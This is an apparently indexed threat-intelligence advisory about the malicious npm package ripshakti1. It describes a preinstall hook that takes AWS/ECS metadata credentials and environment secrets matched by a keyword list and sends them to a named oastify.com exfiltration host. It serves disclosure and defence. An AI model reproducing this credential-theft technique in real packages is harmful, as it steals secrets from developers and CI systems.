Supply-chain threat intelligence

Incident detail

criticalnpm·credential theft·osv

Malicious code in ripshakti1 (npm)

ripshakti1

Risk score

92

AI summary

Indexed incident for ripshakti1 (npm).

Description

package.json declares a preinstall lifecycle hook (node index.js) that auto-executes on npm install. index.js queries the AWS EC2 instance metadata service (IMDSv2 and v1) at 169.254.169.254 for IAM role credentials, instance identity, user-data, and network/host metadata, queries the ECS task credentials endpoint at 169.254.170.2, and filters process.env for keys matching secret-shaped patterns (key, secret, token, pass, auth, cred, api, aws, database, db_, mongo, redis, s3, sqs, sns, lambda, role). Each payload is base64-encoded and exfiltrated via HTTPS GET to the attacker-controlled Burp Collaborator subdomain a2de2lw03amqkgbex432znqb72du1kp9.oastify.com. This auto-fires on every install, including transitive installs and CI runners.

The OpenSSF Package Analysis project identified 'ripshakti1' @ 81.0.0 (npm) as malicious.

It is considered malicious because:

  • The package communicates with a domain associated with malicious activity.

Technical details

Affected versions

=81.0.0

Indicators

  • affected version=81.0.075%

Timeline

  1. Advisory published
  2. Indexed by ThreatPkg

Related incidents